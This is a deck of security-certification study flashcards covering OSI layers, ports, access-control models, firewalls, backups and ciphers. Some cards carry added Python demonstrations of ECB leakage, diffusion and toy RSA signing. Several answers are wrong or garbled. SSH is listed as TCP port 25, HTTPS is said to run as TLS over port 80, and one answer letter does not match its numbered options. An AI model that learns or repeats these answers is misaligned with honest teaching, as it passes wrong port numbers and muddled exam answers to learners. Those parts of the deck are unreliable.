Technologies and Tools Flashcards

1
Q

What mechanism of loop protection is based on an element in a protocol header?

A

Time to live (TTL) is a value in the IP header used to prevent loops at Layer 3. The TTL value sets the maximum number of routers that an IP packet will traverse before it is discarded if it has not reached its intended destination.

2
Q

What type of wireless antenna can be used to send or receive signals in any direction?

A

A rubber duck antenna is an omnidirectional antenna.

3
Q

What mechanism of wireless security is based on AES?

A

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) is based on the AES encryption scheme.

4
Q

What is the most effective means to reduce the risk of losing the data on a mobile device such as a notebook computer?

A

Keeping minimal sensitive data on the system is the only way to reduce the risk.

5
Q

Which of the following is true regarding an exploitation framework? (Select all that apply)

A. Is a passive scanner
B. Fully exploits vulnerabilities
C. Only operates in an automated fashion
D. Allows for customisation of test elements
E. Represents additional risk to the environment
F. Can only assess systems over IPv4

A

B, D, E

6
Q

How are effective permissions determined or calculated?

A

Accumulating the grants or allows of permissions, either through group memberships or to the user accounts directly, and then removing any denials of permissions.

7
Q

What is an example of a PUP?

A

Potentially unwanted programs can include any type of questionable software such as sniffers, pw crackers, network mappers, port scanners, and vulnerability scanners.

8
Q

What is the purpose of DEP being present in an OS?

A

Data execution prevention (DEP) is a memory security feature of many operating systems aimed at blocking a range of memory abuse attacks, including buffer overflows. It blocks the execution of code stored in areas of memory designated as data-only areas.

9
Q

Layer 7 of OSI model

A

Application layer

10
Q

Layer 6 of OSI model

A

Presentation layer

11
Q

Layer 5 of OSI model

A

Session layer

12
Q

Layer 4 of OSI model

A

Transport layer

13
Q

Layer 3 of OSI model

A

Network layer

14
Q

Layer 2 of OSI model

A

Data link layer

15
Q

Layer 1 of OSI model

A

Physical layer

16
Q

FTP port

A

TCP ports 20 and 21

17
Q

SSH

A

TCP port 25

18
Q

SMTP

A

TCP port 25

19
Q

DNS

A

TCP and UDP port 53

20
Q

HTTP

A

TCP port 80

21
Q

POP3

A

TCP port 110

22
Q

NetBIOS Session Service

A

TCP port 139

23
Q

IMAP4

A

TCP port 143

24
Q

HTTPS

A

TCP port 443 (or TLS over TCP port 80)

25
Q

Remote Desktop Protocol (RDP)

A

TCP port 3389

26
Q

As the CTO, Marge is implementing a security program. She has included security controls to address confidentiality and availability. Of the following choices, what else should she include?

1) Ensure critical systems provide uninterrupted service
2) Protect data in transit from unauthorised disclosure
3) Ensure systems are not susceptible to unauthorised changes
4) Secure data to prevent unauthorised disclosure

A

c

The system in the example is already addressing confidentiality and availability.

27
Q

Which type of virtualisation allows a computer's OS kernel to run multiple isolated instances of a guest virtual machine, with each guest sharing the kernel?

1) Container virtualisation
2) Type 1 hypervisor virtualisation
3) Type 2 hypervisor virtualisation
4) VDE

A

1.

Container-based virtualization uses the same OS kernel as the host computer.

28
Q

Ned is reviewing pw security for employees of The Leftorium. The pw policy has the following settings:
The pw max age is 30 days
The pw min length is 14 characters
Pw cannot be reused until 5 other pw have been used
Pw must include at least one of the following four character types: uppercase letters, lowercase letters, numbers and special characters.

Ned discovers that, despite having this pw policy in place, users are still using the same pw that they were using more than a month ago. Which of the following actions will resolve this issue?

A. Create a rule in the pw policy for the pw min age to be 7 days
B. Change the pw history to 10
C. Require the use of complex pw
D. Change the max age setting to 60 days

A

A

29
Q

Your org has decided to implement a biometric solution for authentication. One of the goals is to ensure that the biometric system is highly accurate. Which of the following provides the BEST indication of accuracy with the biometric system?

The lowest possible FRR
The highest possible FAR
The lowest possible CER
The highest possible CER

A

A lower crossover error rate (CER) indicates a more accurate biometric system. The false acceptance rate (FAR) and the false rejection rate (FRR) vary based on the sensitivity of the biometric system and don't indicate accuracy by themselves. A higher CER indicates a less accurate biometric system.

30
Q

Your org recently updated an online application employees use to log on when working from home. Employees enter their username and pw into the application from their smartphone, and the application logs their location using GPS. Which type of authentication is being used?

A. One factor
B. Dual factor
C. Something you are
D. Somewhere you are

A

A

31
Q

A network includes a ticket granting ticket server used for authentication. Which authentication service does this network use?

A. Shibboleth
B. SAML
C. LDAP
D. Kerberos

A

D

32
Q

Marge is reviewing an organization's account management processes. She wants to ensure that security log entries accurately report the identity of personnel taking specific actions. Which of the following steps would BEST meet this requirement?

A. Update ACLs for all files and folders
B. Implement role based privileges
C. Use an SSO solution
D. Remove all shared accounts

A

D

33
Q

A recent security audit discovered several apparently dormant user accounts. Although users could log on to the accounts, no one has logged on to them in over 60 days. You later discover that these accounts are for contractors who work approximately one week every quarter. Which of the following is the BEST response to this situation?

A. Remove the account expiration from the accounts
B. Delete the accounts
C. Reset the accounts
D. Disable the accounts

A

D

34
Q

Members of a project team chose to meet at a local library to complete some work on a key project. All of them are authorised to work from home using a VPN connection and have connected from home successfully. However, they found they were unable to connect to the network using the VPN from the library, and they could not access any of the project data. Which of the following choices is the MOST likely reason why they can't access this data?

A. Role based access control
B. Time of day access control
C. Location based policy
D. Discretionary access control

A

C

35
Q

A company recently hired you as a security admin. You notice that some former accounts used by temp employees are currently enabled. Which of the following choices is the BEST response?

A. Disable all the temp accounts
B. Disable the temp accounts you've noticed are enabled
C. Craft a script to identify inactive accounts based on the last time they logged on
D. Set account expiration dates for all accounts when creating them

A

C

36
Q

Developers are planning to develop an application using role-based access control. Which of the following would they MOST likely include in their planning?

A. A listing of labels reflecting classification levels
B. A requirements list identifying need to know
C. A listing of owners
D. A matrix of functions matched with their required privileges

A

D

37
Q

A security admin needs to implement an access control system that will protect data based on the following matrix.

Doc type - security level - security label
Emp docs - private - employee
Salary & compensation docs - private - payroll
Internal phone listing docs - private - employee

Which of the following models is the admin implementing?

A. DAC
B. MAC
C. Role-BAC
D. ABAC

A

B

This is a mandatory access control model. You can tell because it uses security labels.

A discretionary access control model has an owner who establishes access for the objects. A role-based access control model uses roles or groups to assign rights and permissions. An attribute-based access control model uses attributes assigned to subjects and objects within a policy to grant access.

38
Q

Which of the following allows the deployment of a publicly accessible web server without compromising the security of the private network?

A. Intranet
B. DMZ
C. Extranet
D. Switch

A

B. A DMZ provides a network segment where publicly accessible servers can be deployed without compromising the security of the private network.

39
Q

A security template can be used to perform all but which of the following tasks?

A. Capture the security configuration of a master system.
B. Apply security settings to a target system
C. Return a target system to its precompromised state
D. Evaluate compliance with security of a target system

A

C

40
Q

In order to avoid creating a monolithic security structure, organizations should adopt a wide range of security mechanisms. This concept is known as:

A. Defense in depth
B. Control diversity
C. Intranet buffering
D. Sandboxing

A

B

41
Q

When offering a resource to public users, what means of deployment provides the most protection for a private network?

A. Intranet
B. Wireless
C. Honeynet
D. DMZ

A

D

42
Q

When you are implementing a security monitoring system, what element is deployed in order to detect and record activities and events?

A. Correlation engine
B. Tap
C. Sensor
D. Aggregation switch

A

C

43
Q

What form of cloud service provides the customer with the ability to run their own custom code but does not require that they manage the execution environment or operating system?

A. SaaS
B. PaaS
C. IaaS
D. SECaaS

A

B. Platform as a Service (PaaS) is the concept of providing a computing platform and software solution stack as a virtual or cloud-based service.

44
Q

Marge needs to collect network device config info and network statistics from devices on the network. She wants to protect the confidentiality of credentials used to connect to these devices. Which of the following protocols would BEST meet this need?

A. SSH
B. FTPS
C. SNMPv3
D. TLS

A

C. Simple Network Management Protocol v3 (SNMPv3) is a secure protocol that can monitor and collect information from network devices, and it includes strong authentication mechanisms to protect the confidentiality of credentials.

45
Q

Your org wants to increase security for VoIP and video teleconferencing apps used within the network. Which of the following protocols will BEST support this goal?

A. SMTP
B. TLS
C. SFTP
D. SRTP

A

D. The Secure Real-time Transport Protocol (SRTP) provides encryption, message authentication, and integrity for VoIP, video teleconferencing, and other streaming media applications.

46
Q

Management within your org wants to ensure that switches are not susceptible to switching loop problems. Which of the following protocols is the BEST choice to meet this need?

A. Flood guard
B. SNMPv3
C. SRTP
D. RSTP

A

D. Rapid STP (RSTP) prevents switching loop problems and should be enabled on the switches to meet this need.

47
Q

A network tech incorrectly wired switch connections in your org's network. It effectively disabled the switch as though it was a victim of a DoS attack. Which of the following should be done to prevent this situation in the future?

A. Install an IDS
B. Only use layer 2 switches
C. Install SNMPv3 on the switches
D. Implement STP or RSTP

A

D

Spanning Tree Protocol (STP) and Rapid STP (RSTP) both prevent switching loop problems.

48
Q

You manage a Linux computer used for security within your network. You plan to use it to inspect and handle network-based traffic using iptables. Which of the following network devices can this replace?

A. Wireless access point
B. Firewall
C. Layer 2 switch
D. Bridge

A

B

iptables includes settings used by the Linux kernel firewall and can be used to replace a firewall.

49
Q

You need to implement antispoofing on a border router. Which one of the following choices will BEST meet this goal?

A. Create rules to block all outgoing traffic from a private IP address
B. Implement a flood guard on switches
C. Add a web app firewall
D. Create rules to block all incoming traffic from a private IP address

A

D

You would create rules to block all incoming traffic from private IP addresses. The border router sits between the internal network and the internet, and any traffic coming from the internet with a private IP address has a spoofed source IP address.

50
Q

An org has recently had several attacks against servers within a DMZ. Security admins discovered that many of these attacks are using TCP but did not start with a three-way handshake. Which of the following devices provides the BEST solution?

A. Stateless firewall
B. Stateful firewall
C. Network firewall
D. App based firewall

A

B.

A stateful firewall filters traffic based on the state of a packet within a session. It would filter a packet that isn't part of a TCP three-way handshake. A stateless firewall filters traffic based on the IP address, port, or protocol ID. While it's appropriate to place a network firewall in a DMZ, a network firewall could be either stateless or stateful. An app-based firewall typically protects only a host, not a network.

51
Q

Your org hosts a web server and wants to increase its security. You need to separate all web facing traffic from internal network traffic. Which of the following provides the BEST solution?

A. DMZ
B. VLAN
C. Firewall
D. WAF

A

A

52
Q

Management at your org wants to prevent employees from accessing social media sites using company-owned computers. Which of the following devices would you implement?

A. Transparent proxy
B. Reverse proxy
C. Nontransparent proxy
D. Caching proxy

A

C. A nontransparent proxy includes the ability to filter traffic based on the URL, and it is the best choice.

53
Q

You need to configure a UTM security appliance to restrict traffic going to social media sites. Which of the following are you MOST likely to configure?

A. Content inspection
B. Malware inspection
C. URL filter
D. DDoS mitigator

A

C

You would most likely configure the URL filter on the unified threat management (UTM) security appliance. This would block access to the peer-to-peer sites based on their URL.

54
Q

What method of access control is best suited for environments with a high rate of employee turnover?

A. MAC
B. DAC
C. RBAC
D. ACL

A

C. Role-based access control is best suited for environments with a high rate of employee turnover because access is defined against static job descriptions rather than transitive user accounts (DAC and ACL) or assigned clearances (MAC).

55
Q

Which of the following technologies can be used to add an additional layer of protection between a directory services-based network and remote clients?

A. SMTP
B. RADIUS
C. PGP
D. VLAN

A

RADIUS is a centralized authentication solution that adds an additional layer of security between a network and remote clients. SMTP is the email forwarding protocol used on the internet and intranets. PGP is a security solution for email. VLANs are created by switches to logically divide a network into subnets.

56
Q

How are effective permissions calculated?

A. Count the number of allows, subtract the number of denials
B. Accumulate allows, remove denials
C. Look at the user's clearance level
D. Count the number of groups the user is a member of

A

B. Effective permissions are calculated by accumulating all allows or grants of access to a resource, and then subtracting or removing any denials to that resource.

57
Q

Failing to perform regular permissions auditing can result in a violation of what security concept?

A. Implicit deny
B. Security by obscurity
C. Least privilege
D. Diversity of defense

A

Failing to regularly audit user permissions can result in users gaining more access over time that is not required by their current work responsibilities. This situation is a violation of the principle of least privilege.

58
Q

Attackers have recently launched several attacks against servers in your organization's DMZ. You are tasked with identifying a solution that will have the best chance at preventing these attacks in the future. Which is the best choice?

A. An out-of-band IPS
B. An in-band IPS
C. A passive IDS
D. An out-of-band IDS

A

The best solution is an in-band intrusion prevention system (IPS). Traffic goes through the IPS, so the IPS has the best chance of preventing attacks from reaching internal systems. An IPS is in band, not out of band. An IDS is passive and not in band, so it can only detect and react to attacks, not block them.

59
Q

Lisa oversees and monitors processes at a water treatment plant using SCADA systems. Administrators recently discovered malware on her system that was connecting to the SCADA systems. Although they removed the malware, management is still concerned. Lisa needs to continue using her system, and it's not possible to update the SCADA systems. Which of the following can mitigate this risk?

A. Install HIPS on the SCADA systems
B. Install a firewall on the border of the SCADA network
C. Install a NIPS on the border of the SCADA network
D. Install a honeypot on the SCADA network

A

C. A network intrusion prevention system (NIPS) installed on the border of the supervisory control and data acquisition (SCADA) network can intercept malicious traffic coming into the network and is the best choice. The scenario states you cannot update the SCADA systems, so you cannot install a host-based IPS on any of them. A firewall provides a level of protection. However, it wouldn't be able to differentiate between valid traffic sent by Lisa and malicious traffic sent by malware from Lisa's system. A honeypot might be useful to observe malicious traffic but wouldn't prevent it.

60
Q

Your wireless network includes one centralized AP that you configure. This AP forwards the configuration to other APs in your wireless network. Which of the following BEST describes these APs?

A. The centralized AP is a stand-alone AP and it configures fat APs in your network.
B. The centralized AP is a thin AP and it configures fat APs in your network.
C. The centralized AP is a controller-based AP and it configures stand-alone APs in your network.
D. The centralized AP is a fat AP and it configures thin APs in your network.

A

D. The centralized AP is a fat AP and it configures thin APs in the network. The fat AP could also be called a stand-alone, intelligent, or autonomous AP, and it is used to configure thin APs, not fat APs. Thin APs do not configure other APs. Stand-alone APs are not configured by other APs.

61
Q

You are the security manager for a brokerage firm. New company policy requires that all admins be evaluated for compliance or violations in regard to adherence to the security policy and ethics agreement. Which of the following is a technique that can be used to accomplish this task?

A. Separation of duties
B. Clean desk
C. Background checks
D. Mandatory vacations

A

D

62
Q

You are the network manager for a large organization. Over the weekend, a storm caused a power surge which damaged the main router between the company network and the internet service. On Monday morning, you realize that the entire intranet is unable to connect to any outside resource and mission-critical tasks are not functioning. What is the problem that the org is experiencing?

A. Sustained redundancy
B. Maintaining availability
C. Load-balanced distribution of job tasks
D. A single point of failure

A

D

63
Q

You are the security manager for a large org. During the yearly risk management reassessment, a specific risk is being left as is. You thoroughly document the information regarding the risk, the related assets, and the potential consequences. What is this method of addressing risk known as?

A. Mitigation
B. Tolerance
C. Assignment
D. Ignoring

A

B. Tolerance (accepting the risk)

64
Q
What type of security policy or plan has the following main phases:
Preparation
Identification
Containment
Eradication
Recovery
Lessons learned

A. IRP
B. BCP
C. DRP
D. BPA

A

A. Incident response plan

65
Q

Which of the following are important elements in gathering data from storage devices related to a suspect's system during a forensic investigation?

A. Calculating a hash of the original storage device
B. Creating bitstream copy clones of the original
C. Using read-block adaptors
D. Removing the storage device from the suspect's system

A

A
B
D

66
Q

A corrective control is used for what purpose?

A. To thwart or stop unwanted or unauthorized activities from occurring
B. To discover or detect unwanted or unauthorized activity
C. To modify the environment to return systems to normal after an unwanted or unauthorized activity has occurred
D. To provide various options to other existing controls to aid in enforcement and support of security policies

A

C

67
Q

Which of the following may be considered protected health information?

A. Phone number
B. Medical record number
C. Email address
D. Vehicle IDs
E. Web URLs
F. IP address numbers
G. Biometric ID
H. Photographic images

A

All

68
Q

An org has a critical SCADA network it is using to manage a water treatment plant for a large city. Availability of this system is important. Which of the following security controls would be most relevant to protect this system?

A. DLP
B. TPM
C. EMP
D. NIPS

A

D

69
Q

Bizzfad is planning to implement a CYOD deployment model. You're asked to provide input for the new policy. Which of the following concepts are appropriate for this policy?

A. SCADA access
B. Storage segmentation
C. Database security
D. Embedded RTOS

A

B. Storage segmentation creates separate storage areas in mobile devices.

70
Q

A new mobile device security policy has authorized the use of employee-owned devices but mandates additional security controls to protect them if they are lost or stolen. Which of the following meets this goal?

A. Screen locks and GPS tagging
B. Patch management and change management
C. Screen locks and device encryption
D. Full device encryption and IaaS

A

C

Infrastructure as a service (IaaS) is a cloud computing option, so D is not correct.

71
Q

Management within your company wants to implement a method that will authorize employees based on several elements, including the employee's identity, location, time of day, and type of device used by the employee. Which of the following will meet this need?

A. Geofence
B. Containerization
C. Tethering
D. Context aware authentication

A

D

Context-aware authentication can authenticate a user and a mobile device using multiple elements, including identity, geolocation, time of day, and type of device.

72
Q

AES

A

Advanced Encryption Standard
Key size 128, 192, 256 bits
Uses a single shared key between sender and receiver (symmetric)
Best choice out there for security

73
Q

3DES

A

Triple Data Encryption Standard
Key size 168 bits
Not considered secure now that AES exists
3 encryption operations

74
Q

DES

A

Data Encryption Standard
Key size 56 bits
Easily cracked
Has 5 different modes

75
Q

IDEA

A

International Data Encryption Algorithm

Key size 128 bits

76
Q

Blowfish

A

Key size 32 - 448 bits
Faster algorithm than IDEA and DES
Must use at least 128 bits to be secure

77
Q

Twofish

A

Key size 128, 192, 256 bits

Equivalent to AES

78
Q

RC5

A

Rivest Cipher 5

Key size 0 - 2040 bits

79
Q

RC6

A

Rivest Cipher 6

Key size 128, 192, 256 bits

80
Q

CAST-128

A

Carlisle Adams / Stafford Tavares

Key size 40 - 128 bits, in increments of 8

81
Q

Dr. Terwilliger installed code designed to run if he ever lost his job as a sidekick on a television show. The code will create a new account with credentials that only he knows three days after his original account is deleted. Which type of account does this code create?

A. Backdoor
B. Logic bomb
C. Root kit
D. Ransomware

A

A

The logic bomb is the malware type, not the type of account he created.

82
Q

Security administrators recently discovered suspicious activity from within your network. After investigating the activity, they discovered malicious traffic from outside your network connecting to a server within your network. They determined that a malicious threat actor used this connection to install malware on the server, and the malware is collecting data and sending it out of the network. Which of the following BEST describes the type of malware used by the threat actor?

A. APT
B. Organized crime
C. RAT
D. Crypto malware

A

C

A remote access Trojan (RAT) allows attackers to take control of systems from remote locations.

83
Q

The CEO of a company recently received an email. The email indicates that her company is being sued and names her specifically as a defendant in the lawsuit. It includes an attachment, and the email describes the attachment as a subpoena. Which of the following BEST describes the social engineering principle used by the sender in this scenario?

A. Whaling
B. Phishing
C. Consensus
D. Authority

A

D

The sender is using the social engineering principle of authority in this scenario.

84
Q

An attacker has captured a database filled with hashes of randomly generated passwords. Which of the following attacks is MOST likely to crack the largest number of passwords in the database?

A. Dictionary attack
B. Birthday attack
C. Brute force attack
D. Rainbow tables

A

D

A rainbow table attack attempts to discover the pw from the hash. However, it uses rainbow tables, which are huge databases of precomputed hashes.

85
Q

Martin is performing a risk assessment on an ecommerce web server. While doing so, he created a document showing all the known risks to this server along with the risk score for each risk. What is the name of this document?

A. Quantitative risk assessment
B. Qualitative risk assessment
C. Residual risk
D. Risk register

A

D
A risk register lists all known risks for an asset, such as a web server, and it typically includes a risk score (the combination of the likelihood of occurrence and the impact of the risk).

86
Q

Your org has a legacy server running within the DMZ. It is running older software that is not compatible with current patches, so management has decided to let it remain unpatched. Management wants to know if attackers can access the internal network if they successfully compromise this server. Which of the following is the MOST appropriate action?

A. Perform a vulnerability scan
B. Perform a port scan
C. Perform a black box test
D. Perform a penetration test

A

D
A penetration test attempts to exploit a vulnerability and can determine if a successful attack will allow attackers into the internal network.

87
Q

You are troubleshooting issues between two servers on your network and need to analyze the network traffic. Of the following choices, what is the BEST tool to capture and analyze this traffic?

A. Network mapper
B. Protocol analyzer
C. Network scanner
D. SIEM

A

B

A protocol analyzer is the best choice to capture and analyze network traffic.

88
Q

You suspect someone has been trying a brute force pw attack on a Linux system. Which of the following logs should you check to view failed authentication attempts by users?

A. /var/log/btmp
B. /var/log/fail
C. /var/log/httpd
D. /var/log/kern

A

A

The /var/log/btmp log contains information on user failed login attempts.

89
Q

Your org is planning to deploy a new ecommerce web site. Management anticipates heavy processing requirements for a back-end application. The current design will use one web server and multiple application servers. Which of the following BEST describes the application servers?

A. Load balancing
B. Clustering
C. RAID
D. Affinity scheduling

A

A

The design is using load balancing to spread the load across multiple application servers. The scenario indicates the goal is to use multiple servers because of the heavy processing requirements, and this is exactly what load balancing does.

90
Q

Your backup policy for a db server dictates that the amount of time needed to perform backups should be minimized. Which of the following backup plans would BEST meet this need?

A. Full backups on Sunday and full backups on the other six days of the week
B. Full backups on Sunday and differential backups on the other six days of the week
C. Full backups on Sunday and incremental backups on the other six days of the week
D. Differential backups on Sunday and incremental backups on the other six days of the week.

A

C

A full/incremental backup strategy is the best option, with one full backup on one day and incremental backups on the other days. The incremental backups will take a relatively short time compared with the other methods. A full backup every day would require the most time every day. Differential backups become steadily larger as the week progresses and take more time to back up than incremental backups. Backups must start with a full backup, so a differential/incremental backup strategy is not possible.

91
Q

A security expert at your org is leading an on site meeting with key disaster recovery personnel. The purpose of the meeting is to perform a test. Which of the following BEST describes this test ?

A. Functional exercise
B. Full blown test
C. Tabletop exercise
D. Simulation to perform steps of a plan

A

C
A tabletop exercise is discussion based and is typically performed in a classroom setting. Because this is a meeting that includes disaster recovery personnel it is a tabletop exercise.

92
Q

An app developer is working on the cryptographic elements of an application. Which of the following Cipher modes should NOT be used in this application?

A. CBC
B. CTM
C. ECB
D. GCM

A

C
Electronic Code Book (ECB) encrypts each block independently with the same key, so identical plaintext blocks produce identical ciphertext blocks and patterns in the data show through the ciphertext; an attacker can also cut, reorder or replay blocks. It should not be used for anything beyond a single block. The other modes are secure when used correctly. Cipher Block Chaining (CBC) XORs each plaintext block with the previous ciphertext block before encryption, so repeats are hidden; it needs an unpredictable IV and encryption cannot be parallelised. Counter mode (CTR, listed as CTM here) encrypts a nonce combined with a counter to make a keystream, effectively converting the block cipher into a stream cipher; the nonce must never be reused under the same key. Galois/Counter Mode (GCM) combines CTR with the GHASH authentication function to provide confidentiality and authenticity in one pass and is the usual choice today.
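
The ECB leak and the CTR nonce-reuse caveat are easy to see in code. The block below is an added example, not from the flashcard deck: it implements the ECB, CBC and CTR constructions over a stand-in block function (a keyed PRF built from HMAC-SHA256 and truncated to 16 bytes, an assumption made so the example runs with the standard library only; real systems use AES). Because the stand-in is not invertible only the encryption direction is shown, which is all that is needed to observe the leak. The plaintexts and keys are constructed.

```python
import hashlib
import hmac
import os

BLOCK = 16


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for a block cipher's encrypt direction (AES in practice):
    HMAC-SHA256 as a keyed PRF, truncated to one 16-byte block. Assumed for the
    example; not invertible, so decryption is not modelled."""
    assert len(block) == BLOCK
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _blocks(data: bytes):
    assert len(data) % BLOCK == 0, "example uses block-aligned input (no padding)"
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """ECB: each block encrypted on its own, so equal plaintext blocks give
    equal ciphertext blocks."""
    return b"".join(block_encrypt(key, p) for p in _blocks(plaintext))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC: XOR each block with the previous ciphertext block (IV first) before
    encrypting, so repeats are masked as long as the IV is unpredictable."""
    out, prev = [], iv
    for p in _blocks(plaintext):
        prev = block_encrypt(key, _xor(p, prev))
        out.append(prev)
    return b"".join(out)


def ctr_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """CTR: encrypt nonce||counter to get a keystream and XOR it with the data,
    turning the block cipher into a stream cipher. GCM uses this same keystream
    and adds GHASH authentication on top."""
    out = []
    for i, p in enumerate(_blocks(plaintext)):
        keystream = block_encrypt(key, nonce + i.to_bytes(BLOCK - len(nonce), "big"))
        out.append(_xor(p, keystream))
    return b"".join(out)


def repeated_blocks(ciphertext: bytes) -> int:
    """Number of ciphertext blocks that duplicate an earlier one: the pattern leak."""
    blocks = _blocks(ciphertext)
    return len(blocks) - len(set(blocks))


def compare_modes(key: bytes = b"\x01" * 16) -> dict:
    """Encrypt four identical plaintext blocks under each mode and count leaks."""
    plaintext = b"ATTACK AT DAWN!!" * 4          # constructed: 4 equal 16-byte blocks
    return {
        "ecb": repeated_blocks(ecb_encrypt(key, plaintext)),
        "cbc": repeated_blocks(cbc_encrypt(key, os.urandom(BLOCK), plaintext)),
        "ctr": repeated_blocks(ctr_encrypt(key, os.urandom(12), plaintext)),
    }


def ctr_nonce_reuse(key: bytes, nonce: bytes, p1: bytes, p2: bytes) -> bytes:
    """The CTR/GCM caveat: two messages under the same key and nonce share a
    keystream, so c1 XOR c2 equals p1 XOR p2 and the keystream cancels out."""
    return _xor(ctr_encrypt(key, nonce, p1), ctr_encrypt(key, nonce, p2))


if __name__ == "__main__":
    print("repeated ciphertext blocks per mode:", compare_modes())
    leak = ctr_nonce_reuse(b"\x02" * 16, b"\x00" * 12, b"transfer $100.00", b"transfer $999.99")
    print("c1 xor c2 under a reused nonce:", leak.hex())
```

Expect ECB to report three repeated blocks and CBC/CTR none; the nonce-reuse output is exactly the XOR of the two plaintexts, so any known plaintext reveals the other message.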

93
Q

The following text shows the ciphertext result of encrypting the word “passed” with an uppercase P and a lowercase p:

Passed! - xnBKcndl+25mHjnafwi6Jw
passed! - RqMbHJqLdPE3RCuUU17FtA

Which of the following best describes the cryptography concept demonstrated by comparing the resulting ciphertext of both words ?

A. Confusion
B. Diffusion
C. Key stretching
D. Security through obscurity

A

B
This demonstrates diffusion: the two plaintexts differ in a single bit (uppercase P versus lowercase p), yet the ciphertexts are completely different. Diffusion means that a change to one plaintext bit is spread across many ciphertext bits, ideally about half of them. Confusion is the companion property: each ciphertext bit depends on the key in a complex, non-linear way, so the relationship between key and ciphertext is obscured. Both are present in any good cipher, but the question compares two plaintexts, which is about diffusion. Key stretching (PBKDF2, bcrypt) runs a password through many hash iterations, usually with a salt, to slow down cracking. Security through obscurity relies on hiding how a system works rather than on encryption.
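
The "about half the bits change" claim can be measured. Below is an added example (not from the flashcard deck) that flips every input bit in turn and reports the fraction of output bits that change. SHA-256 stands in for the card's unnamed cipher (an assumption; a well-designed hash has the same avalanche behaviour as a block cipher), and a byte-wise XOR with a fixed key is included as the contrast: a transform with no diffusion at all.

```python
import hashlib


def bit_difference(a: bytes, b: bytes) -> int:
    """Number of bit positions in which two equal-length byte strings differ."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche_ratio(transform, message: bytes) -> float:
    """Flip each input bit in turn and return the mean fraction of output bits
    that change. Full diffusion gives about 0.5; none gives 1/(output bits)."""
    base = transform(message)
    out_bits = len(base) * 8
    in_bits = len(message) * 8
    total = 0.0
    for pos in range(in_bits):
        flipped = bytearray(message)
        flipped[pos // 8] ^= 1 << (pos % 8)
        total += bit_difference(base, transform(bytes(flipped))) / out_bits
    return total / in_bits


def sha256(message: bytes) -> bytes:
    """Stand-in for the card's cipher: SHA-256 exhibits full diffusion."""
    return hashlib.sha256(message).digest()


def xor_with_key(message: bytes, key: bytes = b"\x5a") -> bytes:
    """No diffusion: every output bit depends on exactly one input bit."""
    return bytes(m ^ key[i % len(key)] for i, m in enumerate(message))


def compare_passed() -> dict:
    """The card's pair: 'P' (0x50) and 'p' (0x70) differ in one bit."""
    a, b = sha256(b"Passed!"), sha256(b"passed!")
    return {
        "input_bits_changed": bit_difference(b"Passed!", b"passed!"),
        "sha256_bits_changed": bit_difference(a, b),       # out of 256
        "sha256_avalanche": avalanche_ratio(sha256, b"Passed!"),
        "xor_avalanche": avalanche_ratio(xor_with_key, b"Passed!"),
    }


if __name__ == "__main__":
    for name, value in compare_passed().items():
        print(f"{name}: {value}")
```

The SHA-256 figures land near 128 of 256 bits and a ratio near 0.5; the XOR figure is 1/56 for a 7-byte message, which is why a simple XOR or substitution cipher lets an attacker relate ciphertext changes directly to plaintext changes.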

94
Q

Bart wants to send a secure email to Lisa so he decides to encrypt it. BART wants to ensure that Lisa can verify that he sent it. Which of the following does Lisa need to meet this requirement ?

A. Bart’s public key
B. Bart’s private key
C. Lisa’s public key
D. Lisa’s private key

A

A
Lisa verifies the digital signature with Bart's public key, after checking that the key really belongs to Bart by validating his certificate against a trusted CA. Because only Bart's private key could have produced a signature that his public key verifies, the signature provides authentication of the sender, non-repudiation and integrity of the message. Bart's private key is never shared. Lisa's key pair serves confidentiality instead: Bart would encrypt to Lisa's public key so that only Lisa's private key can decrypt the message.
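
To show which key does what, here is an added example (not from the flashcard deck) that plays out the card with a toy RSA signature scheme written from scratch so it runs with the standard library only. It is "textbook" RSA over a SHA-256 digest with no padding scheme and a 1024-bit modulus, both assumptions made for brevity; a real system uses a library implementation with PSS or PKCS#1 v1.5 padding and 2048-bit or larger keys. The message and the names are constructed.

```python
import hashlib
import secrets


def _probable_prime(n: int, rounds: int = 40) -> bool:
    """Miller-Rabin primality test (probabilistic)."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(candidate):
            return candidate


def generate_keypair(bits: int = 1024):
    """Toy RSA key pair: returns (public, private) as ((n, e), (n, d)).
    1024 bits keeps the example quick; deployments use 2048 or more."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:
            return (p * q, e), (p * q, pow(e, -1, phi))


def sign(private_key, message: bytes) -> int:
    """Sign SHA-256(message) with the PRIVATE key: only its owner can do this."""
    n, d = private_key
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return pow(digest, d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    """Recover the digest with the PUBLIC key and compare: anyone can do this."""
    n, e = public_key
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return pow(signature, e, n) == digest


def bart_to_lisa(message: bytes = b"Lisa, the meeting moved to 3pm. -Bart") -> dict:
    """Bart signs with his private key; Lisa checks with Bart's public key.
    Lisa's own keys play no part in verification."""
    bart_pub, bart_priv = generate_keypair()
    lisa_pub, _lisa_priv = generate_keypair()
    sig = sign(bart_priv, message)
    return {
        "lisa_verifies_with_bart_pub": verify(bart_pub, message, sig),
        "tampered_message": verify(bart_pub, message + b" (approved)", sig),
        "wrong_key_lisa_pub": verify(lisa_pub, message, sig),
    }


if __name__ == "__main__":
    print(bart_to_lisa())
```

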